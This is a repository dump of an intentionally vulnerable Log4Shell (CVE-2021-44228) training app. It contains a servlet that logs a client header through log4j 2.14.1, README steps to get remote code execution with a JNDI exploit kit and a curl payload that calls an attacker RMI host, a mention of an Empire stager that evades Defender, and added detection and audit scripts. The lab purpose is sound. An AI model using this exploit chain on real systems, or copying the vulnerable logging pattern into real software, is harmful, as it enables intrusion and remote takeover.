├── README.md
├── build.gradle
├── gradle
│   └── wrapper
│       ├── gradle-wrapper.jar
│       └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
├── log4shell_rce_demo.png
├── log4shell_rce_demo_empire.png
└── src
    └── main
        ├── java
        │   ├── dvl4wa
        │   │   └── VulnServlet.java
        │   └── launch
        │       ├── DefaultServlet.java
        │       └── Main.java
        ├── resources
        │   └── log4j2.properties
        └── webapp
            ├── WEB-INF
            │   └── web.xml
            └── index.html

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# log4shell vulnerable app

This is a basic, minimal, intentionally vulnerable Java web application
including a version (2.14.1) of the [log4j](https://en.wikipedia.org/wiki/Log4j)
library affected by the infamous
[log4shell](https://en.wikipedia.org/wiki/Log4Shell) (CVE-2021-44228)
vulnerability.

## build and run instructions

The Gradle wrapper should solve everything. Simply git clone the repo:

```
git clone https://github.com/tothi/log4shell-vulnerable-app
```

### running with gradle wrapper

In the project dir (the one containing [build.gradle](./build.gradle)),
simply run:

```
./gradlew appRun
```

or on Windows:

```
.\gradlew.bat appRun
```

A JDK is needed. Versions 8 and 11 were tested and are working; 17 seems to
have issues.

### building a portable fat jar

This method builds a one-file portable fat JAR including an embedded
Tomcat server.

Simply run the gradle wrapper with the configured `shadowJar` task:

```
./gradlew shadowJar
```

or on Windows:

```
.\gradlew.bat shadowJar
```

The compiled and packaged JAR file will be built in the folder `./build/libs`.

It is portable and can be launched with a JRE:

```
java -jar ./build/libs/log4shell-vulnerable-app-all.jar
```

The all-in-one portable JAR is also available on the [releases page](https://github.com/tothi/log4shell-vulnerable-app/releases) of the repo.

### interacting with the vulnerable application

The vulnerable application listens on _all_ interfaces by
default (DANGEROUS behavior if you run it on a production box).

It is available on the URL:

```
http://<host>:8888/app/
```

Note that the log4j vulnerability triggers only when the app performs
some log4j logging activity. In this demo app, that happens when accessing
the URL:

```
http://<host>:8888/app/servlet
```

and passing a string in the header "x-log" (this is what gets logged).
For example, using curl:

```
curl http://<host>:8888/app/servlet -H 'x-log: <string>'
```

This highlights that __detecting the log4j vulnerability is not obvious at all__.

## exploiting the RCE

Here are some instructions on how to exploit the RCE (even on up-to-date
default Java configurations with trustURLCodebase set to false).
Tested on Linux and Windows with Java 11.0.1[23].

Simply use the [JNDI Injection Exploit Kit](https://github.com/welk1n/JNDI-Injection-Exploit) by welk1n or a more recent [fork](https://github.com/pimps/JNDI-Exploit-Kit) by pimps.

Steps to perform (in this example, the target host is 192.168.56.101 and the attacker host is 192.168.56.1):

1. Launch the vulnerable web app with `.\gradlew.bat appRun`. It listens
   on 192.168.56.101:8888 and uses Tomcat 8.5 as a backend. Tomcat 8 (in the classpath) is mandatory for the javax.el.ELProcessor RMI exploit path (supported by the current version of the JNDI Injection Exploit Kit).

2. Build the JNDI Injection Exploit Kit with `mvn package` and launch it on the attacker host with `java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe'` (the payload will execute calc.exe on the target). The helper servers are now started on 192.168.56.1. Assume the RMI URL offered for the trustURLCodebase=false config is `rmi://192.168.56.1:1099/xzmtee`.

3. Trigger the exploit by sending the malicious payload through the "x-log" header: `curl http://192.168.56.101:8888/app/servlet -H 'x-log: ${jndi:rmi://192.168.56.1:1099/xzmtee}'`

4. The app uses the vulnerable log4j to log the contents of the "x-log" header. While logging, it looks up the referenced RMI URL, and the JNDI Kit answers with the RCE payload's classloading reference.

5. Note that instead of the actual content of the "x-log" header, the referenced class name ("javax.el.ELProcessor") gets logged.

6. On the target host, calc.exe should be spawned, reaching RCE.

![](./log4shell_rce_demo.png)

UPDATE: here is an extra PoC screenshot for those who are curious and doubt whether launching calc.exe is useful for anything at all. In this screenshot, the calc.exe payload was replaced with an Empire stager giving a full featured C2 Empire Agent (also bypassing up-to-date Windows Defender).
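Step 5 above points at a detection opportunity on the defender's side: this app's own console log (written through the PatternLayout in `src/main/resources/log4j2.properties`) either keeps the raw `${jndi:...}` string when the lookup failed, or logs the `javax.el.ELProcessor` class name when it succeeded. The following scanner is an added example, not part of the original repo; the log lines it scans are constructed, not a real capture.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Parser for the console output this app produces with its log4j2.properties
# PatternLayout:  %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<level>[A-Z]+)\s+"
    r"(?P<logger>[^\s:]+):(?P<line>\d+) - (?P<msg>.*)$"
)
# Any log4j lookup syntax surviving in a logged message: a client-supplied header
# value has no legitimate reason to contain it.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
# The JNDI lookup itself (the README's x-log payload form), case-insensitive.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# The README notes that after a successful lookup the class name
# "javax.el.ELProcessor" is logged instead of the header content.
ARTIFACT_PREFIX = "javax.el.ELProcessor"


@dataclass
class Finding:
    ts: str
    logger: str
    kind: str      # "jndi-lookup" | "elprocessor-artifact" | "lookup-syntax"
    message: str


def classify(msg: str) -> Optional[str]:
    """Return the finding kind for one logged message, or None if benign."""
    if JNDI_RE.search(msg):
        return "jndi-lookup"            # lookup string left unresolved (e.g. callback failed)
    if msg.startswith(ARTIFACT_PREFIX):
        return "elprocessor-artifact"   # lookup resolved: strongest signal of success
    if LOOKUP_RE.search(msg):
        return "lookup-syntax"          # some other lookup reached the logger
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Parse PatternLayout lines and collect suspicious log events."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                    # stack-trace continuation lines etc.
        kind = classify(m["msg"])
        if kind:
            findings.append(Finding(m["ts"], m["logger"], kind, m["msg"]))
    return findings


# Constructed sample of the app's console output (not a real capture).
SAMPLE_LOG = """\
2021-12-12 10:00:01 INFO  VulnServlet:22 - hello from a benign client
2021-12-12 10:00:05 INFO  VulnServlet:22 - ${jndi:rmi://192.168.56.1:1099/xzmtee}
2021-12-12 10:00:09 INFO  VulnServlet:22 - javax.el.ELProcessor@1a2b3c4d
2021-12-12 10:00:12 INFO  VulnServlet:22 - ${date:yyyy} price check
2021-12-12 10:00:15 DEBUG VulnServlet:22 - nothing to see here
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.ts} {f.kind:22} {f.logger}: {f.message}")
```

The `%L` line number in the pattern is also a useful pivot: every hit from this app should carry `VulnServlet:22`, the `logger.info(...)` call.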

![](./log4shell_rce_demo_empire.png)

--------------------------------------------------------------------------------
/build.gradle:
--------------------------------------------------------------------------------
plugins {
    id "war"
    id "org.gretty" version "3.0.5"
    id "com.github.johnrengelman.shadow" version "7.1.2"
    id "java"
}

sourceCompatibility = "1.8"
targetCompatibility = "1.8"

repositories {
    mavenCentral()
}

dependencies {
    // the log4j-core release affected by CVE-2021-44228
    implementation 'org.apache.logging.log4j:log4j-core:2.14.1'
    // embedded Tomcat is only needed for the shadowJar (fat JAR) build
    if (project.gradle.startParameter.taskNames.first().contains("shadow")) {
        implementation 'org.apache.tomcat.embed:tomcat-embed-jasper:8.5.75'
    }
}

gretty {
    contextPath = 'app'
    servletContainer = 'tomcat85'
}

sourceSets {
    main {
        java {
            srcDir 'src'
            // the launch/ package (embedded Tomcat entry point) is compiled only for the fat JAR
            if (!project.gradle.startParameter.taskNames.first().contains("shadow")) {
                exclude '**/launch/**'
            }
        }
    }
}

jar {
    manifest {
        attributes('Main-Class': 'launch.Main')
    }
}
--------------------------------------------------------------------------------
/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/gradle/wrapper/gradle-wrapper.jar
--------------------------------------------------------------------------------
/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-7.3.1-bin.zip
zipStoreBase=GRADLE_USER_HOME
zipStorePath=wrapper/dists
--------------------------------------------------------------------------------
/gradlew:
--------------------------------------------------------------------------------
/gradlew, /gradlew.bat: the unmodified Gradle-generated wrapper start scripts
(Apache License 2.0) for the Gradle 7.3.1 distribution named in
gradle-wrapper.properties; they contain nothing specific to this app.
--------------------------------------------------------------------------------
/log4shell_rce_demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/log4shell_rce_demo.png
--------------------------------------------------------------------------------
/log4shell_rce_demo_empire.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tothi/log4shell-vulnerable-app/4a230a9a614595440f88968301c645f3e2a3ceca/log4shell_rce_demo_empire.png
--------------------------------------------------------------------------------
/src/main/java/dvl4wa/VulnServlet.java:
--------------------------------------------------------------------------------
package dvl4wa;

import javax.servlet.*;
import javax.servlet.http.*;
import java.io.*;
import java.io.Writer;
import java.util.Map;
import java.util.Collections;
import java.util.stream.Collectors;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

// The intentionally vulnerable endpoint: whatever the client sends in the
// "x-log" header is handed to log4j 2.14.1 as the log message, and that
// version expands ${...} lookups (including ${jndi:...}) inside messages.
public class VulnServlet extends HttpServlet {
    protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException {
        Logger logger = LogManager.getLogger(VulnServlet.class);
        try {
            // Collect all request headers into a name -> value map.
            Map<String, String> headers = Collections.list(req.getHeaderNames()).stream()
                    .collect(Collectors.toMap(h -> h, req::getHeader));
            res.setContentType("text/plain; charset=utf-8");
            Writer writer = res.getWriter();
            if (headers.containsKey("x-log")) {
                writer.write("Logging to console using vulnerable log4j2!\n");
                // Attacker-controlled string becomes the log message: the CVE-2021-44228 sink.
                logger.info(headers.get("x-log"));
            } else {
                writer.write("Hello world\n");
            }
            writer.close();
        }
        catch (Exception e) {
            throw new ServletException(e.getMessage(), e);
        }
    }
}

--------------------------------------------------------------------------------
/src/main/java/launch/DefaultServlet.java:
--------------------------------------------------------------------------------
package launch;

import javax.servlet.*;
import javax.servlet.http.*;
import java.io.Writer;

// Landing page served by the fat-JAR launcher (the WAR build serves webapp/index.html instead).
public class DefaultServlet extends HttpServlet {
    protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException {
        try {
            res.setContentType("text/html; charset=utf-8");
            Writer writer = res.getWriter();
            // The HTML tags below are reconstructed: the markup was lost in extraction and only
            // the visible text survived. The href is an assumption (relative to /app/, which
            // resolves to the /servlet/* mapping registered in Main.java).
            writer.write("<html>\n<head><title>Damn Vulnerable log4j Web Application</title></head>\n");
            writer.write("<body>\n<p><a href=\"servlet\">Click here</a> to reach the vulnerable endpoint.</p>\n");
            writer.write("<p>Use the HTTP Header 'x-log' for triggering the vulnerability.</p>\n");
            writer.write("</body>\n</html>\n");
            writer.close();
        } catch (Exception e) {
            throw new ServletException(e.getMessage(), e);
        }
    }
}

--------------------------------------------------------------------------------
/src/main/java/launch/Main.java:
--------------------------------------------------------------------------------
package launch;

import org.apache.catalina.startup.Tomcat;
import org.apache.catalina.Context;

import java.io.File;

import dvl4wa.VulnServlet;

// Entry point of the shadowJar build: starts an embedded Tomcat and registers
// both servlets programmatically (no web.xml is used in this mode).
public class Main {
    private static final int PORT = 8888;

    public static void main(String[] args) throws Exception {
        String contextPath = "/app";
        String appBase = ".";
        Tomcat tomcat = new Tomcat();
        tomcat.setPort(PORT);                  // binds on all interfaces by default
        tomcat.getHost().setAppBase(appBase);
        File docBase = new File(System.getProperty("java.io.tmpdir"));
        Context ctx = tomcat.addContext(contextPath, docBase.getAbsolutePath());

        Class<?> servletClass = VulnServlet.class;
        Class<?> servletClassDefault = DefaultServlet.class;
        tomcat.addServlet(ctx, servletClass.getSimpleName(), servletClass.getName());
        tomcat.addServlet(ctx, servletClassDefault.getSimpleName(), servletClassDefault.getName());
        ctx.addServletMappingDecoded("/servlet/*", servletClass.getSimpleName());   // the logging endpoint
        ctx.addServletMappingDecoded("/", servletClassDefault.getSimpleName());

        tomcat.start();
        tomcat.getServer().await();
    }
}

--------------------------------------------------------------------------------
/src/main/resources/log4j2.properties:
--------------------------------------------------------------------------------
status = warn
name = ConsoleLogConfigDemo

# Console appender configuration
appender.console.type = Console
appender.console.name = consoleLogger
appender.console.layout.type = PatternLayout
# %m renders the message with lookups enabled (the default in 2.14.1)
appender.console.layout.pattern = %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

# Root logger level
rootLogger.level = debug
# Root logger referring to console appender
rootLogger.appenderRef.stdout.ref = consoleLogger

--------------------------------------------------------------------------------
/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!-- element tags reconstructed from the surviving text; the root element's
     namespace/version attributes were lost in extraction and are not restored -->
<web-app>
    <display-name>Damn Vulnerable Log4j Web Application</display-name>

    <welcome-file-list>
        <welcome-file>index.html</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>log4j</servlet-name>
        <servlet-class>dvl4wa.VulnServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>log4j</servlet-name>
        <url-pattern>/servlet</url-pattern>
    </servlet-mapping>
</web-app>

--------------------------------------------------------------------------------
/src/main/webapp/index.html:
--------------------------------------------------------------------------------
<!-- markup reconstructed: only the visible text survived extraction; the href is
     an assumption (relative to /app/, matching the /servlet mapping in web.xml) -->
<html>
<head>
<title>Damn Vulnerable log4j Web Application</title>
</head>
<body>
<p><a href="servlet">Click here</a> to reach the vulnerable endpoint.</p>

<p>Use the HTTP Header "x-log" for triggering the vulnerability.</p>

</body>
</html>
--------------------------------------------------------------------------------
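Two settings in the files above are what make this app exploitable: the `log4j-core:2.14.1` coordinate in build.gradle and the plain `%m` conversion in log4j2.properties. The audit script below is an added example, not part of this repo; it embeds the repo's own two lines as constructed input beside hardened variants, and its version threshold assumes the Java 8 line (older Java versions have separate backport releases).

```python
import re
from typing import List, Tuple

# Fixed log4j-core release for the Java 8 line (assumption: the app targets
# Java 8+, as build.gradle's sourceCompatibility "1.8" indicates).
FIXED_VERSION = (2, 17, 1)

DEP_RE = re.compile(r"org\.apache\.logging\.log4j:log4j-core:([\d.]+)")
# %m / %msg / %message conversion with an optional {options} list;
# the lookahead keeps %mdc and similar conversions from matching.
MSG_CONV_RE = re.compile(r"%(?:message|msg|m)(?![A-Za-z])(\{[^}]*\})?")


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in v.split("."))


def audit_gradle(text: str) -> List[str]:
    """Flag log4j-core coordinates below the fixed release."""
    findings = []
    for m in DEP_RE.finditer(text):
        ver = m.group(1)
        if parse_version(ver) < FIXED_VERSION:
            findings.append(
                f"log4j-core {ver} < {'.'.join(map(str, FIXED_VERSION))}: "
                "affected by CVE-2021-44228, upgrade the dependency")
    return findings


def audit_properties(text: str) -> List[str]:
    """Flag PatternLayout patterns whose message conversion still resolves lookups."""
    findings = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep or not key.strip().endswith(".layout.pattern"):
            continue
        for conv in MSG_CONV_RE.finditer(value):
            opts = conv.group(1) or ""
            if "nolookups" not in opts:
                findings.append(
                    f"{key.strip()}: {conv.group(0)} renders lookups inside "
                    "client-controlled messages; use %m{nolookups} "
                    "(a mitigation only; upgrading log4j-core is the fix)")
    return findings


def audit_all(gradle: str, props: str) -> List[str]:
    return audit_gradle(gradle) + audit_properties(props)


# Constructed inputs: the repo's own settings beside hardened variants.
VULNERABLE_GRADLE = "implementation 'org.apache.logging.log4j:log4j-core:2.14.1'\n"
HARDENED_GRADLE = "implementation 'org.apache.logging.log4j:log4j-core:2.17.1'\n"
VULNERABLE_PROPS = (
    "appender.console.layout.type = PatternLayout\n"
    "appender.console.layout.pattern = %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n\n"
)
HARDENED_PROPS = VULNERABLE_PROPS.replace("%m%n", "%m{nolookups}%n")

if __name__ == "__main__":
    for finding in audit_all(VULNERABLE_GRADLE, VULNERABLE_PROPS):
        print("FAIL:", finding)
    print("hardened findings:", audit_all(HARDENED_GRADLE, HARDENED_PROPS))
```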